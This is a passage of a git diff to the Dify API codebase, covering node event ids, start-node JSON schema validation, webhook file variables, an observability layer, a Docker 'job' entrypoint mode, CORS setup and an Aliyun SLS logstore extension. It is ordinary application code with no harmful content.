id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent: return NodeRunLoopNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent: return NodeRunLoopSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopFailedEvent) -> 
NodeRunLoopFailedEvent: return NodeRunLoopFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent: return NodeRunIterationStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent: return NodeRunIterationNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent: return NodeRunIterationSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent: return NodeRunIterationFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent: return NodeRunRetrieverResourceEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, retriever_resources=event.retriever_resources, diff --git a/api/core/workflow/nodes/start/start_node.py b/api/core/workflow/nodes/start/start_node.py index 38effa79f7..36fc5078c5 100644 --- a/api/core/workflow/nodes/start/start_node.py +++ 
b/api/core/workflow/nodes/start/start_node.py @@ -1,3 +1,4 @@ +import json from typing import Any from jsonschema import Draft7Validator, ValidationError @@ -42,15 +43,25 @@ class StartNode(Node[StartNodeData]): if value is None and variable.required: raise ValueError(f"{key} is required in input form") - if not isinstance(value, dict): - raise ValueError(f"{key} must be a JSON object") - schema = variable.json_schema if not schema: continue + if not value: + continue + try: - Draft7Validator(schema).validate(value) + json_schema = json.loads(schema) + except json.JSONDecodeError as e: + raise ValueError(f"{schema} must be a valid JSON object") + + try: + json_value = json.loads(value) + except json.JSONDecodeError as e: + raise ValueError(f"{value} must be a valid JSON object") + + try: + Draft7Validator(json_schema).validate(json_value) except ValidationError as e: raise ValueError(f"JSON object for '{key}' does not match schema: {e.message}") - node_inputs[key] = value + node_inputs[key] = json_value diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py index 3631c8653d..ec8c4b8ee3 100644 --- a/api/core/workflow/nodes/trigger_webhook/node.py +++ b/api/core/workflow/nodes/trigger_webhook/node.py @@ -1,14 +1,22 @@ +import logging from collections.abc import Mapping from typing import Any +from core.file import FileTransferMethod +from core.variables.types import SegmentType +from core.variables.variables import FileVariable from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.enums import NodeExecutionType, NodeType from core.workflow.node_events import NodeRunResult from core.workflow.nodes.base.node import Node +from factories import file_factory +from factories.variable_factory import build_segment_with_type from .entities import ContentType, WebhookData +logger = logging.getLogger(__name__) + 
    def generate_file_var(self, param_name: str, file: dict) -> FileVariable | None:
        """Build a FileVariable for a webhook file parameter.

        Args:
            param_name: Name of the webhook parameter the file belongs to.
            file: File mapping from the webhook payload. NOTE: mutated in
                place — the generic ``related_id`` is copied into the
                transfer-method-specific key that file_factory expects.

        Returns:
            A FileVariable on success, or None when file_factory rejects
            the mapping (the failure is logged and the caller falls back
            to the raw mapping).
        """
        related_id = file.get("related_id")
        transfer_method_value = file.get("transfer_method")
        if transfer_method_value:
            transfer_method = FileTransferMethod.value_of(transfer_method_value)
            # Each transfer method stores its source id under a different key.
            match transfer_method:
                case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL:
                    file["upload_file_id"] = related_id
                case FileTransferMethod.TOOL_FILE:
                    file["tool_file_id"] = related_id
                case FileTransferMethod.DATASOURCE_FILE:
                    file["datasource_file_id"] = related_id

        try:
            file_obj = file_factory.build_from_mapping(
                mapping=file,
                tenant_id=self.tenant_id,
            )
            file_segment = build_segment_with_type(SegmentType.FILE, file_obj)
            # Selector [node_id, param_name] lets downstream nodes reference this file.
            return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name])
        except ValueError:
            # Best effort: a malformed file mapping should not fail the node.
            logger.error(
                "Failed to build FileVariable for webhook file parameter %s",
                param_name,
                exc_info=True,
            )
            return None
webhook_data.get("files", {}) + if files and isinstance(files, dict): + file = files.get(param_name) + if file and isinstance(file, dict): + file_var = self.generate_file_var(param_name, file) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = files + else: + outputs[param_name] = files + else: + outputs[param_name] = files else: # Get regular body parameter outputs[param_name] = webhook_data.get("body", {}).get(param_name) # Include raw webhook data for debugging/advanced use outputs["_webhook_raw"] = webhook_data - return outputs diff --git a/api/core/workflow/workflow_entry.py b/api/core/workflow/workflow_entry.py index d4ec29518a..ddf545bb34 100644 --- a/api/core/workflow/workflow_entry.py +++ b/api/core/workflow/workflow_entry.py @@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError from core.workflow.graph import Graph from core.workflow.graph_engine import GraphEngine from core.workflow.graph_engine.command_channels import InMemoryChannel -from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer +from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent from core.workflow.nodes import NodeType @@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING from core.workflow.runtime import GraphRuntimeState, VariablePool from core.workflow.system_variable import SystemVariable from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool +from extensions.otel.runtime import is_instrument_flag_enabled from factories import file_factory from models.enums import UserFrom from models.workflow import Workflow @@ -98,6 +99,10 @@ class WorkflowEntry: ) self.graph_engine.layer(limits_layer) + # Add 
observability layer when OTel is enabled + if dify_config.ENABLE_OTEL or is_instrument_flag_enabled(): + self.graph_engine.layer(ObservabilityLayer()) + def run(self) -> Generator[GraphEngineEvent, None, None]: graph_engine = self.graph_engine diff --git a/api/docker/entrypoint.sh b/api/docker/entrypoint.sh index 6313085e64..5a69eb15ac 100755 --- a/api/docker/entrypoint.sh +++ b/api/docker/entrypoint.sh @@ -34,10 +34,10 @@ if [[ "${MODE}" == "worker" ]]; then if [[ -z "${CELERY_QUEUES}" ]]; then if [[ "${EDITION}" == "CLOUD" ]]; then # Cloud edition: separate queues for dataset and trigger tasks - DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" else # Community edition (SELF_HOSTED): dataset, pipeline and workflow have separate queues - DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" fi else DEFAULT_QUEUES="${CELERY_QUEUES}" @@ -69,6 +69,53 @@ if [[ "${MODE}" == "worker" ]]; then elif [[ "${MODE}" == "beat" ]]; then exec celery -A app.celery beat --loglevel ${LOG_LEVEL:-INFO} + +elif [[ "${MODE}" == "job" ]]; then + # Job mode: Run a 
one-time Flask command and exit + # Pass Flask command and arguments via container args + # Example K8s usage: + # args: + # - create-tenant + # - --email + # - admin@example.com + # + # Example Docker usage: + # docker run -e MODE=job dify-api:latest create-tenant --email admin@example.com + + if [[ $# -eq 0 ]]; then + echo "Error: No command specified for job mode." + echo "" + echo "Usage examples:" + echo " Kubernetes:" + echo " args: [create-tenant, --email, admin@example.com]" + echo "" + echo " Docker:" + echo " docker run -e MODE=job dify-api create-tenant --email admin@example.com" + echo "" + echo "Available commands:" + echo " create-tenant, reset-password, reset-email, upgrade-db," + echo " vdb-migrate, install-plugins, and more..." + echo "" + echo "Run 'flask --help' to see all available commands." + exit 1 + fi + + echo "Running Flask job command: flask $*" + + # Temporarily disable exit on error to capture exit code + set +e + flask "$@" + JOB_EXIT_CODE=$? + set -e + + if [[ ${JOB_EXIT_CODE} -eq 0 ]]; then + echo "Job completed successfully." + else + echo "Job failed with exit code ${JOB_EXIT_CODE}." + fi + + exit ${JOB_EXIT_CODE} + else if [[ "${DEBUG}" == "true" ]]; then exec flask run --host=${DIFY_BIND_ADDRESS:-0.0.0.0} --port=${DIFY_PORT:-5001} --debug diff --git a/api/events/event_handlers/clean_when_dataset_deleted.py b/api/events/event_handlers/clean_when_dataset_deleted.py index 1666e2e29f..d6007662d8 100644 --- a/api/events/event_handlers/clean_when_dataset_deleted.py +++ b/api/events/event_handlers/clean_when_dataset_deleted.py @@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs): dataset.index_struct, dataset.collection_binding_id, dataset.doc_form, + dataset.pipeline_id, ) diff --git a/api/extensions/ext_blueprints.py b/api/extensions/ext_blueprints.py index 725e5351e6..cf994c11df 100644 --- a/api/extensions/ext_blueprints.py +++ b/api/extensions/ext_blueprints.py @@ -9,11 +9,21 @@ FILES_HEADERS: tuple[str, ...] 
= (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN) EXPOSED_HEADERS: tuple[str, ...] = ("X-Version", "X-Env", "X-Trace-Id") -def init_app(app: DifyApp): - # register blueprint routers +def _apply_cors_once(bp, /, **cors_kwargs): + """Make CORS idempotent so blueprints can be reused across multiple app instances.""" + + if getattr(bp, "_dify_cors_applied", False): + return from flask_cors import CORS + CORS(bp, **cors_kwargs) + bp._dify_cors_applied = True + + +def init_app(app: DifyApp): + # register blueprint routers + from controllers.console import bp as console_app_bp from controllers.files import bp as files_bp from controllers.inner_api import bp as inner_api_bp @@ -22,7 +32,7 @@ def init_app(app: DifyApp): from controllers.trigger import bp as trigger_bp from controllers.web import bp as web_bp - CORS( + _apply_cors_once( service_api_bp, allow_headers=list(SERVICE_API_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -30,7 +40,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(service_api_bp) - CORS( + _apply_cors_once( web_bp, resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -40,7 +50,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(web_bp) - CORS( + _apply_cors_once( console_app_bp, resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -50,7 +60,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(console_app_bp) - CORS( + _apply_cors_once( files_bp, allow_headers=list(FILES_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -62,7 +72,7 @@ def init_app(app: DifyApp): app.register_blueprint(mcp_bp) # Register trigger blueprint with CORS for webhook calls - CORS( + _apply_cors_once( trigger_bp, allow_headers=["Content-Type", "Authorization", "X-App-Code"], methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"], diff --git a/api/extensions/ext_logstore.py 
def is_enabled() -> bool:
    """Report whether the logstore extension should be activated.

    The extension is enabled only when every required Aliyun SLS
    environment variable carries a non-empty value.

    Returns:
        True if all required Aliyun SLS environment variables are set, False otherwise
    """
    # Pull variables from a .env file before inspecting the environment.
    load_dotenv()

    required = (
        "ALIYUN_SLS_ACCESS_KEY_ID",
        "ALIYUN_SLS_ACCESS_KEY_SECRET",
        "ALIYUN_SLS_ENDPOINT",
        "ALIYUN_SLS_REGION",
        "ALIYUN_SLS_PROJECT_NAME",
    )

    enabled = all(os.environ.get(name) for name in required)
    if not enabled:
        logger.info("Logstore extension disabled: required Aliyun SLS environment variables not set")
    return enabled
def init_app(app):
    """Bind the process-wide SQLAlchemy session factory to this app's engine.

    Wrapped in an app context because ``db.engine`` is resolved from the
    current application.
    """
    with app.app_context():
        configure_session_factory(db.engine)
import DeclarativeBase + +from configs import dify_config +from extensions.logstore.aliyun_logstore_pg import AliyunLogStorePG + +logger = logging.getLogger(__name__) + + +class AliyunLogStore: + """ + Singleton class for Aliyun SLS LogStore operations. + + Ensures only one instance exists to prevent multiple PG connection pools. + """ + + _instance: "AliyunLogStore | None" = None + _initialized: bool = False + + # Track delayed PG connection for newly created projects + _pg_connection_timer: threading.Timer | None = None + _pg_connection_delay: int = 90 # delay seconds + + # Default tokenizer for text/json fields and full-text index + # Common delimiters: comma, space, quotes, punctuation, operators, brackets, special chars + DEFAULT_TOKEN_LIST = [ + ",", + " ", + '"', + '"', + ";", + "=", + "(", + ")", + "[", + "]", + "{", + "}", + "?", + "@", + "&", + "<", + ">", + "/", + ":", + "\n", + "\t", + ] + + def __new__(cls) -> "AliyunLogStore": + """Implement singleton pattern.""" + if cls._instance is None: + cls._instance = super().__new__(cls) + return cls._instance + + project_des = "dify" + + workflow_execution_logstore = "workflow_execution" + + workflow_node_execution_logstore = "workflow_node_execution" + + @staticmethod + def _sqlalchemy_type_to_logstore_type(column: Any) -> str: + """ + Map SQLAlchemy column type to Aliyun LogStore index type. 
+ + Args: + column: SQLAlchemy column object + + Returns: + LogStore index type: 'text', 'long', 'double', or 'json' + """ + column_type = column.type + + # Integer types -> long + if isinstance(column_type, (sa.Integer, sa.BigInteger, sa.SmallInteger)): + return "long" + + # Float types -> double + if isinstance(column_type, (sa.Float, sa.Numeric)): + return "double" + + # String and Text types -> text + if isinstance(column_type, (sa.String, sa.Text)): + return "text" + + # DateTime -> text (stored as ISO format string in logstore) + if isinstance(column_type, sa.DateTime): + return "text" + + # Boolean -> long (stored as 0/1) + if isinstance(column_type, sa.Boolean): + return "long" + + # JSON -> json + if isinstance(column_type, sa.JSON): + return "json" + + # Default to text for unknown types + return "text" + + @staticmethod + def _generate_index_keys_from_model(model_class: type[DeclarativeBase]) -> dict[str, IndexKeyConfig]: + """ + Automatically generate LogStore field index configuration from SQLAlchemy model. + + This method introspects the SQLAlchemy model's column definitions and creates + corresponding LogStore index configurations. When the PG schema is updated via + Flask-Migrate, this method will automatically pick up the new fields on next startup. 
+ + Args: + model_class: SQLAlchemy model class (e.g., WorkflowRun, WorkflowNodeExecutionModel) + + Returns: + Dictionary mapping field names to IndexKeyConfig objects + """ + index_keys = {} + + # Iterate over all mapped columns in the model + if hasattr(model_class, "__mapper__"): + for column_name, column_property in model_class.__mapper__.columns.items(): + # Skip relationship properties and other non-column attributes + if not hasattr(column_property, "type"): + continue + + # Map SQLAlchemy type to LogStore type + logstore_type = AliyunLogStore._sqlalchemy_type_to_logstore_type(column_property) + + # Create index configuration + # - text fields: case_insensitive for better search, with tokenizer and Chinese support + # - all fields: doc_value=True for analytics + if logstore_type == "text": + index_keys[column_name] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=AliyunLogStore.DEFAULT_TOKEN_LIST, + chinese=True, + ) + else: + index_keys[column_name] = IndexKeyConfig(index_type=logstore_type, doc_value=True) + + # Add log_version field (not in PG model, but used in logstore for versioning) + index_keys["log_version"] = IndexKeyConfig(index_type="long", doc_value=True) + + return index_keys + + def __init__(self) -> None: + # Skip initialization if already initialized (singleton pattern) + if self.__class__._initialized: + return + + load_dotenv() + + self.access_key_id: str = os.environ.get("ALIYUN_SLS_ACCESS_KEY_ID", "") + self.access_key_secret: str = os.environ.get("ALIYUN_SLS_ACCESS_KEY_SECRET", "") + self.endpoint: str = os.environ.get("ALIYUN_SLS_ENDPOINT", "") + self.region: str = os.environ.get("ALIYUN_SLS_REGION", "") + self.project_name: str = os.environ.get("ALIYUN_SLS_PROJECT_NAME", "") + self.logstore_ttl: int = int(os.environ.get("ALIYUN_SLS_LOGSTORE_TTL", 365)) + self.log_enabled: bool = os.environ.get("SQLALCHEMY_ECHO", "false").lower() == "true" + self.pg_mode_enabled: bool = 
os.environ.get("LOGSTORE_PG_MODE_ENABLED", "true").lower() == "true" + + # Initialize SDK client + self.client = LogClient( + self.endpoint, self.access_key_id, self.access_key_secret, auth_version=AUTH_VERSION_4, region=self.region + ) + + # Append Dify identification to the existing user agent + original_user_agent = self.client._user_agent # pyright: ignore[reportPrivateUsage] + dify_version = dify_config.project.version + enhanced_user_agent = f"Dify,Dify-{dify_version},{original_user_agent}" + self.client.set_user_agent(enhanced_user_agent) + + # PG client will be initialized in init_project_logstore + self._pg_client: AliyunLogStorePG | None = None + self._use_pg_protocol: bool = False + + self.__class__._initialized = True + + @property + def supports_pg_protocol(self) -> bool: + """Check if PG protocol is supported and enabled.""" + return self._use_pg_protocol + + def _attempt_pg_connection_init(self) -> bool: + """ + Attempt to initialize PG connection. + + This method tries to establish PG connection and performs necessary checks. + It's used both for immediate connection (existing projects) and delayed connection (new projects). + + Returns: + True if PG connection was successfully established, False otherwise. + """ + if not self.pg_mode_enabled or not self._pg_client: + return False + + try: + self._use_pg_protocol = self._pg_client.init_connection() + if self._use_pg_protocol: + logger.info("Successfully connected to project %s using PG protocol", self.project_name) + # Check if scan_index is enabled for all logstores + self._check_and_disable_pg_if_scan_index_disabled() + return True + else: + logger.info("PG connection failed for project %s. Will use SDK mode.", self.project_name) + return False + except Exception as e: + logger.warning( + "Failed to establish PG connection for project %s: %s. 
Will use SDK mode.", + self.project_name, + str(e), + ) + self._use_pg_protocol = False + return False + + def _delayed_pg_connection_init(self) -> None: + """ + Delayed initialization of PG connection for newly created projects. + + This method is called by a background timer 3 minutes after project creation. + """ + # Double check conditions in case state changed + if self._use_pg_protocol: + return + + logger.info( + "Attempting delayed PG connection for newly created project %s ...", + self.project_name, + ) + self._attempt_pg_connection_init() + self.__class__._pg_connection_timer = None + + def init_project_logstore(self): + """ + Initialize project, logstore, index, and PG connection. + + This method should be called once during application startup to ensure + all required resources exist and connections are established. + """ + # Step 1: Ensure project and logstore exist + project_is_new = False + if not self.is_project_exist(): + self.create_project() + project_is_new = True + + self.create_logstore_if_not_exist() + + # Step 2: Initialize PG client and connection (if enabled) + if not self.pg_mode_enabled: + logger.info("PG mode is disabled. Will use SDK mode.") + return + + # Create PG client if not already created + if self._pg_client is None: + logger.info("Initializing PG client for project %s...", self.project_name) + self._pg_client = AliyunLogStorePG( + self.access_key_id, self.access_key_secret, self.endpoint, self.project_name + ) + + # Step 3: Establish PG connection based on project status + if project_is_new: + # For newly created projects, schedule delayed PG connection + self._use_pg_protocol = False + logger.info( + "Project %s is newly created. 
Will use SDK mode and schedule PG connection attempt in %d seconds.", + self.project_name, + self.__class__._pg_connection_delay, + ) + if self.__class__._pg_connection_timer is not None: + self.__class__._pg_connection_timer.cancel() + self.__class__._pg_connection_timer = threading.Timer( + self.__class__._pg_connection_delay, + self._delayed_pg_connection_init, + ) + self.__class__._pg_connection_timer.daemon = True # Don't block app shutdown + self.__class__._pg_connection_timer.start() + else: + # For existing projects, attempt PG connection immediately + logger.info("Project %s already exists. Attempting PG connection...", self.project_name) + self._attempt_pg_connection_init() + + def _check_and_disable_pg_if_scan_index_disabled(self) -> None: + """ + Check if scan_index is enabled for all logstores. + If any logstore has scan_index=false, disable PG protocol. + + This is necessary because PG protocol requires scan_index to be enabled. + """ + logstore_name_list = [ + AliyunLogStore.workflow_execution_logstore, + AliyunLogStore.workflow_node_execution_logstore, + ] + + for logstore_name in logstore_name_list: + existing_config = self.get_existing_index_config(logstore_name) + if existing_config and not existing_config.scan_index: + logger.info( + "Logstore %s has scan_index=false, USE SDK mode for read/write operations. 
" + "PG protocol requires scan_index to be enabled.", + logstore_name, + ) + self._use_pg_protocol = False + # Close PG connection if it was initialized + if self._pg_client: + self._pg_client.close() + self._pg_client = None + return + + def is_project_exist(self) -> bool: + try: + self.client.get_project(self.project_name) + return True + except Exception as e: + if e.args[0] == "ProjectNotExist": + return False + else: + raise e + + def create_project(self): + try: + self.client.create_project(self.project_name, AliyunLogStore.project_des) + logger.info("Project %s created successfully", self.project_name) + except LogException as e: + logger.exception( + "Failed to create project %s: errorCode=%s, errorMessage=%s, requestId=%s", + self.project_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def is_logstore_exist(self, logstore_name: str) -> bool: + try: + _ = self.client.get_logstore(self.project_name, logstore_name) + return True + except Exception as e: + if e.args[0] == "LogStoreNotExist": + return False + else: + raise e + + def create_logstore_if_not_exist(self) -> None: + logstore_name_list = [ + AliyunLogStore.workflow_execution_logstore, + AliyunLogStore.workflow_node_execution_logstore, + ] + + for logstore_name in logstore_name_list: + if not self.is_logstore_exist(logstore_name): + try: + self.client.create_logstore( + project_name=self.project_name, logstore_name=logstore_name, ttl=self.logstore_ttl + ) + logger.info("logstore %s created successfully", logstore_name) + except LogException as e: + logger.exception( + "Failed to create logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + # Ensure index contains all Dify-required fields + # This intelligently merges with existing config, preserving custom indexes + self.ensure_index_config(logstore_name) + + def is_index_exist(self, logstore_name: str) 
-> bool: + try: + _ = self.client.get_index_config(self.project_name, logstore_name) + return True + except Exception as e: + if e.args[0] == "IndexConfigNotExist": + return False + else: + raise e + + def get_existing_index_config(self, logstore_name: str) -> IndexConfig | None: + """ + Get existing index configuration from logstore. + + Args: + logstore_name: Name of the logstore + + Returns: + IndexConfig object if index exists, None otherwise + """ + try: + response = self.client.get_index_config(self.project_name, logstore_name) + return response.get_index_config() + except Exception as e: + if e.args[0] == "IndexConfigNotExist": + return None + else: + logger.exception("Failed to get index config for logstore %s", logstore_name) + raise e + + def _get_workflow_execution_index_keys(self) -> dict[str, IndexKeyConfig]: + """ + Get field index configuration for workflow_execution logstore. + + This method automatically generates index configuration from the WorkflowRun SQLAlchemy model. + When the PG schema is updated via Flask-Migrate, the index configuration will be automatically + updated on next application startup. 
+ """ + from models.workflow import WorkflowRun + + index_keys = self._generate_index_keys_from_model(WorkflowRun) + + # Add custom fields that are in logstore but not in PG model + # These fields are added by the repository layer + index_keys["error_message"] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=self.DEFAULT_TOKEN_LIST, + chinese=True, + ) # Maps to 'error' in PG + index_keys["started_at"] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=self.DEFAULT_TOKEN_LIST, + chinese=True, + ) # Maps to 'created_at' in PG + + logger.info("Generated %d index keys for workflow_execution from WorkflowRun model", len(index_keys)) + return index_keys + + def _get_workflow_node_execution_index_keys(self) -> dict[str, IndexKeyConfig]: + """ + Get field index configuration for workflow_node_execution logstore. + + This method automatically generates index configuration from the WorkflowNodeExecutionModel. + When the PG schema is updated via Flask-Migrate, the index configuration will be automatically + updated on next application startup. + """ + from models.workflow import WorkflowNodeExecutionModel + + index_keys = self._generate_index_keys_from_model(WorkflowNodeExecutionModel) + + logger.debug( + "Generated %d index keys for workflow_node_execution from WorkflowNodeExecutionModel", len(index_keys) + ) + return index_keys + + def _get_index_config(self, logstore_name: str) -> IndexConfig: + """ + Get index configuration for the specified logstore. 
+ + Args: + logstore_name: Name of the logstore + + Returns: + IndexConfig object with line and field indexes + """ + # Create full-text index (line config) with tokenizer + line_config = IndexLineConfig(token_list=self.DEFAULT_TOKEN_LIST, case_sensitive=False, chinese=True) + + # Get field index configuration based on logstore name + field_keys = {} + if logstore_name == AliyunLogStore.workflow_execution_logstore: + field_keys = self._get_workflow_execution_index_keys() + elif logstore_name == AliyunLogStore.workflow_node_execution_logstore: + field_keys = self._get_workflow_node_execution_index_keys() + + # key_config_list should be a dict, not a list + # Create index config with both line and field indexes + return IndexConfig(line_config=line_config, key_config_list=field_keys, scan_index=True) + + def create_index(self, logstore_name: str) -> None: + """ + Create index for the specified logstore with both full-text and field indexes. + Field indexes are automatically generated from the corresponding SQLAlchemy model. + """ + index_config = self._get_index_config(logstore_name) + + try: + self.client.create_index(self.project_name, logstore_name, index_config) + logger.info( + "index for %s created successfully with %d field indexes", + logstore_name, + len(index_config.key_config_list or {}), + ) + except LogException as e: + logger.exception( + "Failed to create index for logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def _merge_index_configs( + self, existing_config: IndexConfig, required_keys: dict[str, IndexKeyConfig], logstore_name: str + ) -> tuple[IndexConfig, bool]: + """ + Intelligently merge existing index config with Dify's required field indexes. + + This method: + 1. Preserves all existing field indexes in logstore (including custom fields) + 2. Adds missing Dify-required fields + 3. 
Updates fields where type doesn't match (with json/text compatibility) + 4. Corrects case mismatches (e.g., if Dify needs 'status' but logstore has 'Status') + + Type compatibility rules: + - json and text types are considered compatible (users can manually choose either) + - All other type mismatches will be corrected to match Dify requirements + + Note: Logstore is case-sensitive and doesn't allow duplicate fields with different cases. + Case mismatch means: existing field name differs from required name only in case. + + Args: + existing_config: Current index configuration from logstore + required_keys: Dify's required field index configurations + logstore_name: Name of the logstore (for logging) + + Returns: + Tuple of (merged_config, needs_update) + """ + # key_config_list is already a dict in the SDK + # Make a copy to avoid modifying the original + existing_keys = dict(existing_config.key_config_list) if existing_config.key_config_list else {} + + # Track changes + needs_update = False + case_corrections = [] # Fields that need case correction (e.g., 'Status' -> 'status') + missing_fields = [] + type_mismatches = [] + + # First pass: Check for and resolve case mismatches with required fields + # Note: Logstore itself doesn't allow duplicate fields with different cases, + # so we only need to check if the existing case matches the required case + for required_name in required_keys: + lower_name = required_name.lower() + # Find key that matches case-insensitively but not exactly + wrong_case_key = None + for existing_key in existing_keys: + if existing_key.lower() == lower_name and existing_key != required_name: + wrong_case_key = existing_key + break + + if wrong_case_key: + # Field exists but with wrong case (e.g., 'Status' when we need 'status') + # Remove the wrong-case key, will be added back with correct case later + case_corrections.append((wrong_case_key, required_name)) + del existing_keys[wrong_case_key] + needs_update = True + + # Second pass: Check 
each required field + for required_name, required_config in required_keys.items(): + # Check for exact match (case-sensitive) + if required_name in existing_keys: + existing_type = existing_keys[required_name].index_type + required_type = required_config.index_type + + # Check if type matches + # Special case: json and text are interchangeable for JSON content fields + # Allow users to manually configure text instead of json (or vice versa) without forcing updates + is_compatible = existing_type == required_type or ({existing_type, required_type} == {"json", "text"}) + + if not is_compatible: + type_mismatches.append((required_name, existing_type, required_type)) + # Update with correct type + existing_keys[required_name] = required_config + needs_update = True + # else: field exists with compatible type, no action needed + else: + # Field doesn't exist (may have been removed in first pass due to case conflict) + missing_fields.append(required_name) + existing_keys[required_name] = required_config + needs_update = True + + # Log changes + if missing_fields: + logger.info( + "Logstore %s: Adding %d missing Dify-required fields: %s", + logstore_name, + len(missing_fields), + ", ".join(missing_fields[:10]) + ("..." if len(missing_fields) > 10 else ""), + ) + + if type_mismatches: + logger.info( + "Logstore %s: Fixing %d type mismatches: %s", + logstore_name, + len(type_mismatches), + ", ".join([f"{name}({old}->{new})" for name, old, new in type_mismatches[:5]]) + + ("..." if len(type_mismatches) > 5 else ""), + ) + + if case_corrections: + logger.info( + "Logstore %s: Correcting %d field name cases: %s", + logstore_name, + len(case_corrections), + ", ".join([f"'{old}' -> '{new}'" for old, new in case_corrections[:5]]) + + ("..." 
if len(case_corrections) > 5 else ""), + ) + + # Create merged config + # key_config_list should be a dict, not a list + # Preserve the original scan_index value - don't force it to True + merged_config = IndexConfig( + line_config=existing_config.line_config + or IndexLineConfig(token_list=self.DEFAULT_TOKEN_LIST, case_sensitive=False, chinese=True), + key_config_list=existing_keys, + scan_index=existing_config.scan_index, + ) + + return merged_config, needs_update + + def ensure_index_config(self, logstore_name: str) -> None: + """ + Ensure index configuration includes all Dify-required fields. + + This method intelligently manages index configuration: + 1. If index doesn't exist, create it with Dify's required fields + 2. If index exists: + - Check if all Dify-required fields are present + - Check if field types match requirements + - Only update if fields are missing or types are incorrect + - Preserve any additional custom index configurations + + This approach allows users to add their own custom indexes without being overwritten. 
